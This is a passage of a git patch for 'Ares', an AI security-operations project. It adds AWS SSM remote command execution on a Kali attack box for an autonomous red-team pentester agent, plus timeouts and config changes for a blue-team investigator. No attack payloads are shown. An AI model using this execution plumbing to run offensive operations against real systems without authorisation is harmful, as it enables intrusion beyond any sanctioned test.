From ed254be1035b8483d7afb7e23fa74570e6ad643c Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 9 Jan 2026 19:19:42 -0700 Subject: [PATCH 1/5] feat: add remote command execution via AWS SSM and blue team detection query templates **Added:** - Introduced `src/ares/core/remote.py` for remote command execution on the Kali attack box via AWS SSM, including SSO credential validation, error handling, and a `run_remote` convenience function - Added `QueryTemplateTools` to `src/ares/tools/blue/query_templates.py`, providing MITRE-mapped LogQL query templates for detecting red team attack patterns and AD attacks - Registered `QueryTemplateTools` in blue team toolset and included in agent factory for investigation agent - Added `boto3>=1.42.25` as a dependency for AWS API integration **Changed:** - Updated all red team network toolsets in `src/ares/tools/red/network.py` to execute commands remotely via SSM instead of subprocess, centralizing command execution and error handling - Refactored Taskfile and documentation defaults: lowered polling mode steps to 50 and once mode steps to 15 for agent timeouts; clarified timeout behaviors in `README.md` and `docs/taskfile_usage.md` - Updated AWS region defaults in `Taskfile.yaml` from `us-west-2` to `us-west-1` - In red team orchestrator, added fail-fast SSO credential validation before starting operations - Improved admin access finding validation in red team reporting to reject error-containing results and require success indicators - Improved blue agent orchestrator with a hard signal-based timeout and robust MCP connection handling - Registered new blue team tools and query templates in import/export lists - Updated dependency and lock files (`pyproject.toml`, `uv.lock`) to add and pin `boto3` and compatible AWS packages, and remove unused aiobotocore/aioitertools - Cleaned up subprocess error handling in red team tools, removing timeouts and local file usage in favor of remote SSM execution **Removed:** - Eliminated all local subprocess execution for red team operations in favor of SSM-based remote execution - Removed unused and incompatible `aiobotocore` and `aioitertools` packages from lock file --- README.md | 25 +- Taskfile.yaml | 27 +- docs/taskfile_usage.md | 15 +- pyproject.toml | 1 + src/ares/agents/blue/soc_investigator.py | 255 ++- src/ares/agents/red/pentester.py | 9 + src/ares/core/factories/blue_factory.py | 7 + src/ares/core/remote.py | 408 +++++ src/ares/main.py | 1 - src/ares/tools/blue/__init__.py | 2 + src/ares/tools/blue/actions.py | 62 +- src/ares/tools/blue/grafana.py | 3 +- src/ares/tools/blue/query_templates.py | 1966 ++++++++++++++++++++++ src/ares/tools/red/network.py | 392 ++--- uv.lock | 70 +- 15 files changed, 2834 insertions(+), 409 deletions(-) create mode 100644 src/ares/core/remote.py create mode 100644 src/ares/tools/blue/query_templates.py diff --git a/README.md b/README.md index 52f373c7..cd924415 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,15 @@ # Ares - Autonomous Security Operations Agent + +
+ +[![Pre-Commit](https://github.com/dreadnode/python-template/actions/workflows/pre-commit.yaml/badge.svg)](https://github.com/dreadnode/python-template/actions/workflows/pre-commit.yaml) +[![Renovate](https://github.com/dreadnode/python-template/actions/workflows/renovate.yaml/badge.svg)](https://github.com/dreadnode/python-template/actions/workflows/renovate.yaml) +[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) + +
+ + [![Pre-Commit](https://github.com/dreadnode/ares/actions/workflows/pre-commit.yaml/badge.svg)](https://github.com/dreadnode/ares/actions/workflows/pre-commit.yaml) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) [![Python](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/downloads/) @@ -161,7 +171,7 @@ uv run python -m ares \ --args.model claude-sonnet-4-20250514 \ --args.grafana-url https://grafana.example.com \ --args.poll-interval 30 \ - --args.max-steps 150 \ + --args.max-steps 50 \ --args.report-dir ./reports # Run once and exit (process current alerts only) @@ -176,7 +186,7 @@ Investigate a specific alert by providing it as JSON: uv run python -m ares investigate-alert test-alerts/example-alert.json \ --args.model claude-sonnet-4-20250514 \ --args.grafana-url https://grafana.example.com \ - --args.max-steps 150 + --args.max-steps 15 ``` #### Red Team - Penetration Testing @@ -212,7 +222,7 @@ task ares:red: TARGET=192.168.1.100 # Or via CLI uv run python -m ares red-team 192.168.1.100 \ --args.model claude-sonnet-4-20250514 \ - --args.max-steps 150 \ + --args.max-steps 50 \ --args.report-dir ./reports ``` @@ -229,8 +239,15 @@ bloodhound-python). | `--args.model` | `claude-sonnet-4-20250514` | LLM model to use | | `--args.grafana-url` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts and MCP | | `--args.poll-interval` | `30` | Seconds between alert polls | -| `--args.max-steps` | `150` | Maximum agent steps per investigation | +| `--args.max-steps` | `50` | Maximum agent steps per investigation | | `--args.report-dir` | `./reports` | Directory for markdown reports | +| `--args.once` | `false` | Process current alerts once and exit | + +**Timeout Behavior:** + +The agent timeout is `max_steps × 60 seconds` (1 minute per step). When using +Taskfile, one-shot modes (`ares:blue:once:`, `ares:investigate`) default to 15 +steps (~15 min), while polling modes default to 50 steps (~50 min per alert). **Dreadnode Platform Arguments (`--dn-args.*`):** diff --git a/Taskfile.yaml b/Taskfile.yaml index 3c6a004b..958be2ff 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -15,7 +15,8 @@ vars: MODEL: '{{.MODEL | default "claude-sonnet-4-20250514"}}' GRAFANA_URL: '{{.GRAFANA_URL | default "https://grafana.dev.plundr.ai"}}' POLL_INTERVAL: '{{.POLL_INTERVAL | default "30"}}' - MAX_STEPS: '{{.MAX_STEPS | default "150"}}' + MAX_STEPS: '{{.MAX_STEPS | default "50"}}' + MAX_STEPS_ONCE: '{{.MAX_STEPS_ONCE | default "15"}}' # ~15 min max for once mode REPORT_DIR: '{{.REPORT_DIR | default "./reports"}}' DREADNODE_SERVER: '{{.DREADNODE_SERVER | default "https://platform.dev.plundr.ai/"}}' DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION | default "ares"}}' @@ -153,7 +154,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal) @@ -178,7 +179,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal) @@ -189,7 +190,7 @@ tasks: --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ --args.poll-interval {{.POLL_INTERVAL}} \ - --args.max-steps {{.MAX_STEPS}} \ + --args.max-steps {{.MAX_STEPS_ONCE}} \ --args.report-dir {{.REPORT_DIR}} \ --args.once \ --dn-args.server {{.DREADNODE_SERVER}} \ @@ -204,7 +205,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | if [ ! -f .env ]; then @@ -233,7 +234,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | if [ ! -f .env ]; then @@ -249,7 +250,7 @@ tasks: --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ --args.poll-interval {{.POLL_INTERVAL}} \ - --args.max-steps {{.MAX_STEPS}} \ + --args.max-steps {{.MAX_STEPS_ONCE}} \ --args.report-dir {{.REPORT_DIR}} \ --args.once \ --dn-args.server {{.DREADNODE_SERVER}} \ @@ -270,7 +271,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal) @@ -280,7 +281,7 @@ tasks: uv run python -m ares investigate-alert {{.ALERT}} \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ - --args.max-steps {{.MAX_STEPS}} \ + --args.max-steps {{.MAX_STEPS_ONCE}} \ --args.report-dir {{.REPORT_DIR}} \ --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.token "$DREADNODE_API_KEY" \ @@ -450,7 +451,7 @@ tasks: internal: true vars: PROFILE: '{{.PROFILE | default "lab"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | # Check if AWS CLI is installed @@ -485,7 +486,7 @@ tasks: vars: TARGET: '{{.TARGET | default ""}}' PROFILE: '{{.PROFILE | default "lab"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' REDTEAM_PROJECT: '{{.REDTEAM_PROJECT | default "ares-redteam"}}' preconditions: - sh: test -n "{{.TARGET}}" @@ -562,11 +563,11 @@ tasks: ares:red:logs: desc: "Tail red team agent logs from Kali via SSM (usage: task ares:red:logs [KALI=instance-name] [LINES=100] [FOLLOW=true])" vars: - KALI: '{{.KALI | default "dev-alpha-operator-range-kali"}}' + KALI: '{{.KALI | default "staging-alpha-operator-range-kali"}}' LINES: '{{.LINES | default "100"}}' FOLLOW: '{{.FOLLOW | default "false"}}' PROFILE: '{{.PROFILE | default "lab"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' deps: - task: check-aws-auth vars: diff --git a/docs/taskfile_usage.md b/docs/taskfile_usage.md index 9e5bf841..ba7b502c 100644 --- a/docs/taskfile_usage.md +++ b/docs/taskfile_usage.md @@ -304,13 +304,26 @@ All tasks support the following configuration variables: | `MODEL` | `claude-sonnet-4-20250514` | LLM model to use | | `GRAFANA_URL` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts | | `POLL_INTERVAL` | `30` | Seconds between alert polls | -| `MAX_STEPS` | `150` | Maximum agent steps per investigation | +| `MAX_STEPS` | `50` | Maximum agent steps for polling mode (~50 min timeout) | +| `MAX_STEPS_ONCE` | `15` | Maximum agent steps for once/investigate modes (~15 min timeout) | | `REPORT_DIR` | `./reports` | Directory for markdown reports | | `DREADNODE_SERVER` | `https://platform.dev.plundr.ai/` | Dreadnode platform URL | | `DREADNODE_ORGANIZATION` | `ares` | Dreadnode organization name | | `DREADNODE_WORKSPACE` | `ares-protocol` | Dreadnode workspace name | | `DREADNODE_PROJECT` | `ares-soc` | Dreadnode project name | +**Timeout Behavior:** + +The agent timeout is calculated as `max_steps × 60 seconds` (1 minute per step): + +| Mode | Default Steps | Max Timeout | +| --- | --- | --- | +| `ares:blue:once:` | 15 | ~15 minutes | +| `ares:blue:local:once:` | 15 | ~15 minutes | +| `ares:investigate` | 15 | ~15 minutes | +| `ares:blue:` (polling) | 50 | ~50 minutes per alert | +| `ares:blue:local:` (polling) | 50 | ~50 minutes per alert | + **Example with custom variables:** ```bash diff --git a/pyproject.toml b/pyproject.toml index 2db34b49..ede9da03 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -21,6 +21,7 @@ dependencies = [ "cyclopts>=4.2.0", "loguru>=0.7.3", "httpx>=0.28.0,<1.0.0", + "boto3>=1.42.25", ] [project.optional-dependencies] diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py index 6a4e3f16..9affbea8 100644 --- a/src/ares/agents/blue/soc_investigator.py +++ b/src/ares/agents/blue/soc_investigator.py @@ -4,6 +4,7 @@ Main agent implementation using Dreadnode Agent SDK. """ +import signal import uuid from datetime import datetime, timedelta, timezone from pathlib import Path @@ -17,6 +18,10 @@ from ares.integrations.mitre import MITREAttackClient +class InvestigationTimeoutError(Exception): + """Raised when investigation exceeds hard timeout.""" + + def build_initial_prompt(alert: dict) -> str: """Build the initial prompt with alert context. @@ -109,19 +114,28 @@ def __init__( self._mcp_tools = None async def _ensure_mcp_connection(self) -> None: - """Ensure MCP connection is established.""" + """Ensure MCP connection is established (with 60s timeout).""" + import asyncio + if self._mcp_client is None: from ares.tools.blue.grafana import connect_grafana_mcp try: logger.info("Connecting to Grafana MCP server...") - self._mcp_client = await connect_grafana_mcp( - grafana_url=self.grafana_url, - grafana_api_key=self.grafana_api_key, + self._mcp_client = await asyncio.wait_for( # type: ignore[func-returns-value] + connect_grafana_mcp( + grafana_url=self.grafana_url, + grafana_api_key=self.grafana_api_key, + ), + timeout=60.0, ) self._mcp_tools = self._mcp_client.tools tool_count = len(self._mcp_tools) if self._mcp_tools else 0 logger.success(f"Grafana MCP connected ({tool_count} tools available)") + except asyncio.TimeoutError: + logger.warning("Grafana MCP connection timed out after 60s") + logger.warning("Continuing without MCP tools") + self._mcp_tools = None except Exception as e: logger.warning(f"Failed to connect to Grafana MCP: {e}") logger.warning("Continuing without MCP tools") @@ -129,10 +143,18 @@ async def _ensure_mcp_connection(self) -> None: async def _shutdown_mcp(self) -> None: """Shutdown MCP connection if active.""" + import asyncio + if self._mcp_client: try: - await self._mcp_client.__aexit__(None, None, None) + # Add timeout to prevent hanging on shutdown + await asyncio.wait_for( + self._mcp_client.__aexit__(None, None, None), + timeout=10.0, + ) logger.info("Grafana MCP connection closed") + except asyncio.TimeoutError: + logger.warning("MCP shutdown timed out after 10s, forcing close") except Exception as e: logger.warning(f"Error closing MCP connection: {e}") finally: @@ -158,104 +180,163 @@ async def investigate(self, alert: dict) -> dict: - highest_pyramid_level: Highest Pyramid of Pain level reached (1-6) Raises: - TimeoutError: If investigation exceeds the configured timeout. + InvestigationTimeoutError: If investigation exceeds the hard timeout. """ investigation_id = f"inv-{uuid.uuid4().hex[:8]}" alert_name = alert.get("labels", {}).get("alertname", "unknown") logger.info(f"Starting investigation {investigation_id} for alert: {alert_name}") - # Ensure MCP connection is ready - await self._ensure_mcp_connection() + # Hard timeout using signal (works even if event loop is blocked) + # 1 minute per step + 2 minutes buffer for setup/teardown + hard_timeout_seconds = (self.max_steps * 60) + 120 + + def _timeout_handler(signum, frame): + raise InvestigationTimeoutError( + f"Investigation {investigation_id} exceeded hard timeout of {hard_timeout_seconds}s" + ) + + # Set up signal-based hard timeout (Unix only) + old_handler = signal.signal(signal.SIGALRM, _timeout_handler) + signal.alarm(hard_timeout_seconds) + logger.info(f"Hard timeout set: {hard_timeout_seconds}s ({hard_timeout_seconds // 60}m)") - # Create investigation state + # Create investigation state early so we can generate partial reports on timeout state = InvestigationState( investigation_id=investigation_id, alert=alert, ) - # Auto-extract and record MITRE technique from alert - labels = alert.get("labels", {}) - annotations = alert.get("annotations", {}) - for key in ["mitre_technique", "mitre", "technique_id", "technique"]: - if labels.get(key): - state.identified_techniques.add(labels[key]) - logger.info(f"Auto-recorded MITRE technique from alert: {labels[key]}") - break - if annotations.get(key): - state.identified_techniques.add(annotations[key]) - logger.info(f"Auto-recorded MITRE technique from alert: {annotations[key]}") - break - - initial_prompt = build_initial_prompt(alert) - - with dn.run(tags=["soc-investigation", alert_name]): - dn.log_params( - model=self.model, - investigation_id=investigation_id, - alert_name=alert_name, - alert_severity=alert.get("labels", {}).get("severity", "unknown"), - max_steps=self.max_steps, - mcp_tools_available=self._mcp_tools is not None, - mcp_tool_count=len(self._mcp_tools) if self._mcp_tools else 0, - ) - dn.log_input("alert", alert) - - agent = create_investigation_agent( - model=self.model, - grafana_url=self.grafana_url, - grafana_api_key=self.grafana_api_key, - mitre_client=self.mitre_client, - state=state, - grafana_mcp_tools=self._mcp_tools, - max_steps=self.max_steps, - ) - - # Run the investigation with timeout - try: - import asyncio - - logger.info(f"Starting agent.run() with max_steps={self.max_steps}") - - # Add a generous timeout (5 minutes per step) - timeout_seconds = self.max_steps * 300 # 5 minutes per step - - result = await asyncio.wait_for( - agent.run(initial_prompt), - timeout=timeout_seconds, + try: + # Ensure MCP connection is ready + await self._ensure_mcp_connection() + + # Auto-extract and record MITRE technique from alert + labels = alert.get("labels", {}) + annotations = alert.get("annotations", {}) + for key in ["mitre_technique", "mitre", "technique_id", "technique"]: + if labels.get(key): + state.identified_techniques.add(labels[key]) + logger.info(f"Auto-recorded MITRE technique from alert: {labels[key]}") + break + if annotations.get(key): + state.identified_techniques.add(annotations[key]) + logger.info(f"Auto-recorded MITRE technique from alert: {annotations[key]}") + break + + initial_prompt = build_initial_prompt(alert) + + with dn.run(tags=["soc-investigation", alert_name]): + dn.log_params( + model=self.model, + investigation_id=investigation_id, + alert_name=alert_name, + alert_severity=alert.get("labels", {}).get("severity", "unknown"), + max_steps=self.max_steps, + mcp_tools_available=self._mcp_tools is not None, + mcp_tool_count=len(self._mcp_tools) if self._mcp_tools else 0, ) + dn.log_input("alert", alert) - logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}") - - # Generate report - report_path = self._generate_report(state, result) - - dn.log_output("report_path", str(report_path)) - dn.log_metric("investigation_success", 1) - - return { - "investigation_id": investigation_id, - "status": "completed" if not state.escalated else "escalated", - "report_path": str(report_path), - "evidence_count": len(state.evidence), - "techniques_identified": list(state.identified_techniques), - "highest_pyramid_level": state.highest_pyramid_level, - } - - except asyncio.TimeoutError as timeout_err: - logger.error(f"Investigation timed out after {timeout_seconds}s") - logger.error( - f"Current state: {len(state.evidence)} evidence items, {len(state.timeline)} timeline events" + agent = create_investigation_agent( + model=self.model, + grafana_url=self.grafana_url, + grafana_api_key=self.grafana_api_key, + mitre_client=self.mitre_client, + state=state, + grafana_mcp_tools=self._mcp_tools, + max_steps=self.max_steps, ) - dn.log_metric("investigation_timeout", 1) - raise TimeoutError( - f"Investigation exceeded {timeout_seconds}s timeout" - ) from timeout_err - except Exception as e: - logger.error(f"Investigation failed: {e}") - dn.log_metric("investigation_failed", 1) - raise + # Run the investigation with asyncio timeout (backup to signal timeout) + try: + import asyncio + + logger.info(f"Starting agent.run() with max_steps={self.max_steps}") + + # Asyncio timeout as secondary measure + timeout_seconds = self.max_steps * 60 + + result = await asyncio.wait_for( + agent.run(initial_prompt), + timeout=timeout_seconds, + ) + + logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}") + + # Check if agent hit max_steps without proper completion + status = "completed" + if state.escalated: + status = "escalated" + elif result.stop_reason and "max" in str(result.stop_reason).lower(): + status = "incomplete" + logger.warning( + f"Agent reached max_steps ({self.max_steps}) without completion" + ) + + # Generate report + report_path = self._generate_report(state, result) + + dn.log_output("report_path", str(report_path)) + dn.log_metric("investigation_success", 1) + + return { + "investigation_id": investigation_id, + "status": status, + "report_path": str(report_path), + "evidence_count": len(state.evidence), + "techniques_identified": list(state.identified_techniques), + "highest_pyramid_level": state.highest_pyramid_level, + } + + except asyncio.TimeoutError: + logger.error(f"Investigation timed out after {timeout_seconds}s (asyncio)") + logger.error( + f"Current state: {len(state.evidence)} evidence items, " + f"{len(state.timeline)} timeline events" + ) + dn.log_metric("investigation_timeout", 1) + + # Still generate a partial report on timeout + report_path = self._generate_report(state, None) + return { + "investigation_id": investigation_id, + "status": "timeout", + "report_path": str(report_path), + "evidence_count": len(state.evidence), + "techniques_identified": list(state.identified_techniques), + "highest_pyramid_level": state.highest_pyramid_level, + } + + except Exception as e: + logger.error(f"Investigation failed: {e}") + dn.log_metric("investigation_failed", 1) + raise + + except InvestigationTimeoutError: + logger.error(f"Investigation hit HARD TIMEOUT after {hard_timeout_seconds}s") + logger.error( + f"Current state: {len(state.evidence)} evidence items, " + f"{len(state.timeline)} timeline events" + ) + dn.log_metric("investigation_hard_timeout", 1) + + # Generate partial report + report_path = self._generate_report(state, None) + return { + "investigation_id": investigation_id, + "status": "hard_timeout", + "report_path": str(report_path), + "evidence_count": len(state.evidence), + "techniques_identified": list(state.identified_techniques), + "highest_pyramid_level": state.highest_pyramid_level, + } + + finally: + # Always cancel the alarm and restore old handler + signal.alarm(0) + signal.signal(signal.SIGALRM, old_handler) + logger.debug("Hard timeout signal handler cleaned up") def _generate_report(self, state: InvestigationState, _result) -> Path: """Generate the markdown investigation report.""" diff --git a/src/ares/agents/red/pentester.py b/src/ares/agents/red/pentester.py index d976f3f1..f72a5daf 100644 --- a/src/ares/agents/red/pentester.py +++ b/src/ares/agents/red/pentester.py @@ -12,6 +12,7 @@ from ares.core.factories.red_factory import create_redteam_agent from ares.core.models import RedTeamState, Target +from ares.core.remote import SSOTokenExpiredError, validate_sso_credentials from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient from ares.reports.redteam import RedTeamReportGenerator @@ -87,6 +88,14 @@ async def execute_operation(self, target_ip: str) -> dict: logger.info(f"Starting red team operation {operation_id} against: {target_ip}") + # Validate SSO credentials before starting - fail fast if expired + try: + validate_sso_credentials() + logger.info("AWS SSO credentials validated successfully") + except SSOTokenExpiredError as e: + logger.error(f"Cannot start operation - {e}") + raise + # Create operation state state = RedTeamState( operation_id=operation_id, diff --git a/src/ares/core/factories/blue_factory.py b/src/ares/core/factories/blue_factory.py index 39022545..5cc06de2 100644 --- a/src/ares/core/factories/blue_factory.py +++ b/src/ares/core/factories/blue_factory.py @@ -15,6 +15,7 @@ CompletionTools, GrafanaTools, InvestigationTools, + QueryTemplateTools, QuestionEngineTools, escalate_investigation, ) @@ -120,6 +121,11 @@ def create_investigation_agent( completion_tools = CompletionTools() completion_tools.set_state(state) + # Query templates for pre-built attack detection queries + # Uses Grafana URL to derive Loki endpoint (assumes /loki proxy) + loki_url = grafana_url.rstrip("/") + query_template_tools = QueryTemplateTools(loki_url=loki_url) + # Build tool list tools: list = [ grafana_tools, @@ -127,6 +133,7 @@ def create_investigation_agent( question_tools, mitre_tools, completion_tools, + query_template_tools, escalate_investigation, ] diff --git a/src/ares/core/remote.py b/src/ares/core/remote.py new file mode 100644 index 00000000..9a4c80c3 --- /dev/null +++ b/src/ares/core/remote.py @@ -0,0 +1,408 @@ +"""Remote command execution via AWS SSM. + +This module provides functionality to execute commands on remote EC2 instances +(specifically the Kali attack box) using AWS Systems Manager (SSM). +""" + +import os +import time +from dataclasses import dataclass +from typing import Any, NoReturn + +import boto3 +from botocore.exceptions import ClientError, SSOTokenLoadError, TokenRetrievalError +from loguru import logger + + +class SSOTokenExpiredError(Exception): + """Raised when AWS SSO token has expired and needs refresh.""" + + +@dataclass +class CommandResult: + """Result of a remote command execution.""" + + stdout: str + stderr: str + return_code: int + success: bool + + @property + def output(self) -> str: + """Combined stdout and stderr output.""" + if self.stderr: + return f"{self.stdout}\n{self.stderr}" + return self.stdout + + +class SSMExecutor: + """Execute commands on remote EC2 instances via AWS SSM. + + This class handles command execution on the Kali attack box using + AWS Systems Manager send-command API. + + Attributes: + instance_id: EC2 instance ID of the target (Kali box) + profile: AWS profile name for authentication + region: AWS region + """ + + def __init__( + self, + instance_id: str | None = None, + instance_name: str | None = None, + profile: str = "lab", + region: str = "us-west-1", + ): + """Initialize the SSM executor. + + Args: + instance_id: EC2 instance ID (if known) + instance_name: EC2 instance Name tag to resolve to instance ID + profile: AWS profile name + region: AWS region + """ + self.profile = profile + self.region = region + self._instance_id = instance_id + self._instance_name = instance_name or os.environ.get( + "ARES_KALI_INSTANCE", "staging-alpha-operator-range-kali" + ) + self._ssm_client: Any = None + self._ec2_client: Any = None + + def _create_session(self) -> boto3.Session: + """Create a boto3 session, validating SSO token first.""" + try: + session = boto3.Session(profile_name=self.profile, region_name=self.region) + # Force credential resolution to catch SSO errors early + credentials = session.get_credentials() + if credentials is None: + raise SSOTokenExpiredError( # noqa: TRY301 + f"No credentials available for profile '{self.profile}'. " + f"Run: aws sso login --profile {self.profile}" + ) + # Try to actually use the credentials to validate them + credentials.get_frozen_credentials() + return session + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except Exception as e: + if "token" in str(e).lower() and ( + "expired" in str(e).lower() or "sso" in str(e).lower() + ): + self._handle_sso_error(e) + raise + + def _handle_sso_error(self, original_error: Exception) -> NoReturn: + """Handle SSO token errors with helpful message and optional auto-refresh.""" + error_msg = ( + f"\n{'=' * 60}\n" + f"AWS SSO TOKEN EXPIRED\n" + f"{'=' * 60}\n" + f"Your AWS SSO session has expired.\n\n" + f"To fix this, run:\n" + f" aws sso login --profile {self.profile}\n\n" + f"Original error: {original_error}\n" + f"{'=' * 60}\n" + ) + logger.error(error_msg) + + # Clear cached clients so next attempt will re-authenticate + self._invalidate_clients() + + raise SSOTokenExpiredError( + f"AWS SSO token expired for profile '{self.profile}'. " + f"Run: aws sso login --profile {self.profile}" + ) from original_error + + def _invalidate_clients(self) -> None: + """Clear cached clients to force re-authentication on next use.""" + self._ssm_client = None + self._ec2_client = None + self._instance_id = None + + @property + def ssm_client(self) -> Any: + """Lazy-load SSM client with SSO token validation.""" + if self._ssm_client is None: + session = self._create_session() + self._ssm_client = session.client("ssm") + return self._ssm_client + + @property + def ec2_client(self) -> Any: + """Lazy-load EC2 client with SSO token validation.""" + if self._ec2_client is None: + session = self._create_session() + self._ec2_client = session.client("ec2") + return self._ec2_client + + @property + def instance_id(self) -> str: + """Resolve and return the instance ID.""" + if self._instance_id is None: + self._instance_id = self._resolve_instance_id() + return self._instance_id + + def _resolve_instance_id(self) -> str: + """Resolve instance name to instance ID via EC2 API.""" + try: + response = self.ec2_client.describe_instances( + Filters=[ + {"Name": "tag:Name", "Values": [self._instance_name]}, + {"Name": "instance-state-name", "Values": ["running"]}, + ] + ) + + for reservation in response.get("Reservations", []): + for instance in reservation.get("Instances", []): + instance_id = instance.get("InstanceId") + if instance_id: + logger.info( + f"Resolved Kali instance '{self._instance_name}' to {instance_id}" + ) + return instance_id + + raise RuntimeError(f"No running instance found with name '{self._instance_name}'") # noqa: TRY301 + + except SSOTokenExpiredError: + raise + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except ClientError as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise RuntimeError(f"Failed to resolve instance ID: {e}") from e + except Exception as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise + + def run_command( + self, + command: str | list[str], + timeout_seconds: int = 300, + working_directory: str = "/tmp", # noqa: S108 # nosec B108 + ) -> CommandResult: + """Execute a command on the remote instance via SSM. + + Args: + command: Command string or list of command parts + timeout_seconds: Maximum time to wait for command completion + working_directory: Directory to execute command in + + Returns: + CommandResult with stdout, stderr, and return code + """ + command_str = " ".join(command) if isinstance(command, list) else command + + # Wrap command to capture exit code and handle errors + wrapped_command = f""" +cd {working_directory} +{command_str} +EXIT_CODE=$? +exit $EXIT_CODE +""" + + try: + logger.debug(f"SSM executing: {command_str[:100]}...") + + response = self.ssm_client.send_command( + InstanceIds=[self.instance_id], + DocumentName="AWS-RunShellScript", + Parameters={"commands": [wrapped_command]}, + TimeoutSeconds=timeout_seconds, + ) + + command_id = response["Command"]["CommandId"] + logger.debug(f"SSM command ID: {command_id}") + + # Wait for command to complete + return self._wait_for_command(command_id, timeout_seconds) + + except SSOTokenExpiredError: + # Re-raise SSO errors without wrapping + raise + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except ClientError as e: + # Check if this is an SSO-related error + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + error_msg = f"SSM command failed: {e}" + logger.error(error_msg) + return CommandResult( + stdout="", + stderr=error_msg, + return_code=1, + success=False, + ) + except Exception as e: + # Catch any other SSO-related errors + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise + + def _wait_for_command( + self, + command_id: str, + timeout_seconds: int, + ) -> CommandResult: + """Wait for SSM command to complete and return result.""" + start_time = time.time() + poll_interval = 2 # seconds + + while True: + elapsed = time.time() - start_time + if elapsed > timeout_seconds: + return CommandResult( + stdout="", + stderr=f"Command timed out after {timeout_seconds} seconds", + return_code=124, + success=False, + ) + + try: + response = self.ssm_client.get_command_invocation( + CommandId=command_id, + InstanceId=self.instance_id, + ) + + status = response.get("Status", "") + + if status in ("Success", "Failed", "Cancelled", "TimedOut"): + stdout = response.get("StandardOutputContent", "") + stderr = response.get("StandardErrorContent", "") + return_code = response.get("ResponseCode", -1) + + # Handle None return code + if return_code is None: + return_code = 0 if status == "Success" else 1 + + success = status == "Success" and return_code == 0 + + logger.debug( + f"SSM command completed: status={status}, return_code={return_code}" + ) + + return CommandResult( + stdout=stdout, + stderr=stderr, + return_code=return_code, + success=success, + ) + + # Still pending, wait and retry + time.sleep(poll_interval) + + except SSOTokenExpiredError: + raise + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except ClientError as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + if "InvocationDoesNotExist" in str(e): + # Command not yet visible, wait and retry + time.sleep(poll_interval) + continue + raise + except Exception as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise + + +# Global executor instance (lazy-loaded) +_executor: SSMExecutor | None = None + + +def get_executor() -> SSMExecutor: + """Get or create the global SSM executor instance.""" + global _executor + if _executor is None: + _executor = SSMExecutor() + return _executor + + +def validate_sso_credentials(profile: str = "lab") -> bool: + """Validate that SSO credentials are available and not expired. + + Call this at the start of an operation to fail fast if credentials + are invalid, rather than failing mid-operation. + + Args: + profile: AWS profile name to validate + + Returns: + True if credentials are valid + + Raises: + SSOTokenExpiredError: If SSO token is expired or invalid + """ + try: + session = boto3.Session(profile_name=profile) + credentials = session.get_credentials() + if credentials is None: + raise SSOTokenExpiredError( # noqa: TRY301 + f"No credentials available for profile '{profile}'. " + f"Run: aws sso login --profile {profile}" + ) + # Force credential resolution to validate token + credentials.get_frozen_credentials() + logger.debug(f"SSO credentials validated for profile '{profile}'") + return True + except (TokenRetrievalError, SSOTokenLoadError) as e: + 